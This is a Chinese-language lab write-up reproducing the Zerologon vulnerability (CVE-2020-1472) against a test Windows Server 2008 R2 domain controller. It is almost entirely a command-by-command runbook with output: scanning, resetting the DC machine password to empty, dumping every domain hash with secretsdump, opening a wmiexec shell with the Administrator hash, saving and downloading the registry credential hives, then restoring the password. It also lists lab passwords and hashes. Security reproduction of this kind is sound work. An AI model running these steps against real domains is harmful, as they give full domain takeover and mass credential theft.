CVE-2020-1472域控复现
这个漏洞是只要与域控建立TCP连接基本上就可以拿到域控
secura在漏洞详情白皮书中写道:
The only thing an attacker needs for that is the ability to set up TCP connections with a vulnerable DC.
漏洞影响版本:
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
域渗透环境搭建
DC:Windows Server 2008 R2
- 域计算机名:DC
- 域名:yyz.com
- 密码xy10xy10
- 目录还原模式的Administrator密码Xy10xy10
- 域用户登录名密码testuser / Xy10xy10
域成员:windows 7
- 计算机名:win7
- 域成员名:win7
- 密码:xy10xy10
工具:kali
复现步骤
首先可以信息搜集一下域控的端口:
┌──(kali㉿kali)-[~]
└─$ nmap -sV 192.168.112.135
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-16 02:41 EST
Nmap scan report for 192.168.112.135
Host is up (0.00038s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB1446A) (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-02-16 07:41:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: yyz.com, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: YYZ)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: yyz.com, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49158/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.84 seconds
可以看到许多端口都是关于DNS、DC、kerberos等服务的
漏洞验证
git clone https://github.com/SecuraBV/CVE-2020-1472
cd CVE-2020-1472\
pip install -r requirements.txt
python3 zerologon_tester.py DC 192.168.112.135
(python3 zerologon_tester.py DC_NETBIOS_NAME DC_IP_ADDR)
得到回应:
Performing authentication attempts...
===================================================================================================================================================================================================================================================================================================================================================================
Success! DC can be fully compromised by a Zerologon attack.
了解利用流程
- 置空域控保存在AD中的密码
- 获取域控用户HASH
- 通过获取到的管理员HASH得到一个SHELL,然后连接上去导出原来计算机中本地保存的HASH
- 通过获取到的HASH恢复置空的域控密码
工具与环境准备
安装Impacket
git clone https://github.com/SecureAuthCorp/impacket
pip install .
我这台kali下面的python3是没有pip的,所以安装了半天pip,中途还遇到了许多大大小小的问题,百度解决即可!
下载exploit
cd examples
git clone https://github.com/dirkjanm/CVE-2020-1472
cd CVE-2020-1472\
攻击开始
置空密码
python3 cve-2020-1472-exploit.py DC 192.168.112.135
(python3 cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP_ADDR)
得到回应:
Performing authentication attempts...
===============================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
这个时候密码就置空了
获取HASH
cd ..
python3 secretsdump.py yyz.com/DC\$@192.168.112.135 -just-dc -no-pass
(python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass)
windows下可以不用转义用这个:python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR -just-dc -no-pass
得到回应:
Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c1388c1a084a2193daaab5189da11ac7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:37955e8242bb9ce29473b4730c5febd6:::
yyz.com\testuser:1105:aad3b435b51404eeaad3b435b51404ee:6b735b12efb7a81d0c1f6404b7a211b0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN7$:1103:aad3b435b51404eeaad3b435b51404ee:21bced4a1619c61fcb4428d870af010b:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:a23943a21ebce9be9a37423ac279bf9a70a16d6eb6720b3dd6127795050fd94a
krbtgt:aes128-cts-hmac-sha1-96:fab1d35530c4a04b8063229bdcd86bb4
krbtgt:des-cbc-md5:a8238af7b634ae3d
yyz.com\testuser:aes256-cts-hmac-sha1-96:2d77a4c4fee83a92e760f82d57e8101dc79d344d088b387d080844cd4565e2d8
yyz.com\testuser:aes128-cts-hmac-sha1-96:68bed6a927b09d2b967cf48a27776e36
yyz.com\testuser:des-cbc-md5:ae3e13945ed91acb
DC$:aes256-cts-hmac-sha1-96:c99341602dfa4f554504a4e810bf8425da82a684d9a6fe70599b231d28c42d15
DC$:aes128-cts-hmac-sha1-96:70c750f9fd52913be61c827081b5dbeb
DC$:des-cbc-md5:2f08730d62e5dc8a
WIN7$:aes256-cts-hmac-sha1-96:922840da3c393fdcb0862ce5b0336610f3c4e43c624b2dcfb051c3ccda3eaef0
WIN7$:aes128-cts-hmac-sha1-96:0aa4910c55c8ee6be060fe750b97ced5
WIN7$:des-cbc-md5:dc31d352a183f8c2
[*] Cleaning up...
*获取SHELL
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c1388c1a084a2193daaab5189da11ac7 yyz.com/Administrator@192.168.112.135
(python3 wmiexec.py -hashes <HASH> DOMAIN/DOMAIN_USER@DC_IP_ADDR)
果然拿到了shell
Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation
[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>dir
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute wmiexec.py again with -codec and the corresponding codec
������ C �еľ�û�б�ǩ��
��������� BA52-5A9F
C:\ ��Ŀ¼
2009/07/14 11:20 <DIR> PerfLogs
2021/02/16 09:58 <DIR> Program Files
2021/02/16 09:18 <DIR> Program Files (x86)
2021/02/16 12:07 <DIR> Users
2021/02/16 15:51 <DIR> Windows
0 ���ļ� 0 ��
5 ��Ŀ¼ 32,107,630,592 ������
C:\>
获取原HASH
在shell中执行以下命令:
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit
解析HASH
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
得到回应:
Impacket v0.9.23.dev1+20210212.143925.3f3002e1 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xe72b35f79ed7c4b89042556952e0d1ea
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6b735b12efb7a81d0c1f6404b7a211b0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:e6cf9dd894e67eb777e686bca16f2e73292a19a98c7c6506b1ccce7bcc4bd7086b721236c47da36dba37ffa23feb3a65613688b7d65deb1d1aa5acf4c7cd45ab660fbfaaa7ebcf37380f298e536ea99b337d31405225bf5debd622a5b7214032720c927173e8ea20cc159a3d7339a501c2f215aa70e1f43ca39886e888fed441315134c60cb38257784a3369e64eebb718c5fd8713763403210d10c78a31d9dc88865ee02127df0461a0a814f911863bdcd7137719ad3ef4b1aa9329054ba44b5cf407b7450ff1c4ec6fcd2f207aa094dbeb94ec019fb503dde67cae3052008d7f8d62540250036657dbda3e6423dea1
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:5d1f5cee1e8a8f5a9e0f5d0013032f46
[*] DefaultPassword
(Unknown User):xy10xy10
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1f3654ef94595af34c117f3e9980eac240b67890
dpapi_userkey:0x85887ea640e44b7cbb72520c62572acc32c8d8cf
[*] NL$KM
0000 EA D0 32 F5 3E CF C2 18 1C 58 31 82 ED 06 1D EE ..2.>....X1.....
0010 82 24 BE 41 6E 05 AD 9D DF 1B 12 80 FC 86 3C D8 .$.An.........<.
0020 7B EC C1 F0 07 19 8B F7 03 11 F7 97 7D 03 E4 57 {...........}..W
0030 7B F6 24 03 2B C6 8F 46 9F BE 6E A1 42 67 C0 BE {.$.+..F..n.Bg..
NL$KM:ead032f53ecfc2181c583182ed061dee8224be416e05ad9ddf1b1280fc863cd87becc1f007198bf70311f7977d03e4577bf624032bc68f469fbe6ea14267c0be
[*] Cleaning up...
保存[*] DefaultPassword 上一行最后一串hash值:5d1f5cee1e8a8f5a9e0f5d0013032f46
恢复HASH
git clone https://github.com/risksense/zerologon
cd zerologon\
python3 reinstall_original_pw.py DC 192.168.112.135 e6cf9dd894e67eb777e686bca16f2e73292a19a98c7c6506b1ccce7bcc4bd7086b721236c47da36dba37ffa23feb3a65613688b7d65deb1d1aa5acf4c7cd45ab660fbfaaa7ebcf37380f298e536ea99b337d31405225bf5debd622a5b7214032720c927173e8ea20cc159a3d7339a501c2f215aa70e1f43ca39886e888fed441315134c60cb38257784a3369e64eebb718c5fd8713763403210d10c78a31d9dc88865ee02127df0461a0a814f911863bdcd7137719ad3ef4b1aa9329054ba44b5cf407b7450ff1c4ec6fcd2f207aa094dbeb94ec019fb503dde67cae3052008d7f8d62540250036657dbda3e6423dea1
(python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR <ORI_HASH>)
成功:
Performing authentication attempts...
==================================================================================================
NetrServerAuthenticate3Response
ServerCredential:
Data: b'(\xae\xe5N\xa1\xe1\x9e{'
NegotiateFlags: 556793855
AccountRid: 1000
ErrorCode: 0
server challenge b'(\xc3f\x0fo\xcf\xf6?'
session key b'\xa8\xf8\xae\xd2\xcfNW\x0fx\xeb\x9f5\xe2\xcc\x12\x9e'
NetrServerPasswordSetResponse
ReturnAuthenticator:
Credential:
Data: b'\x01\x0c\xf0\xab$\xf3\x89\x8e'
Timestamp: 0
ErrorCode: 0
Success! DC machine account should be restored to it's original value. You might want to secretsdump again to check.
检查是否恢复
python3 secretsdump.py yyz.com/DC\$@192.168.112.135 -just-dc -no-pass
可以看到和之前输出的内容一样了。
至此整个漏洞复现完毕!
漏洞详情原理
https://www.secura.com/uploads/whitepapers/Zerologon.pdf
我实在是看不懂。。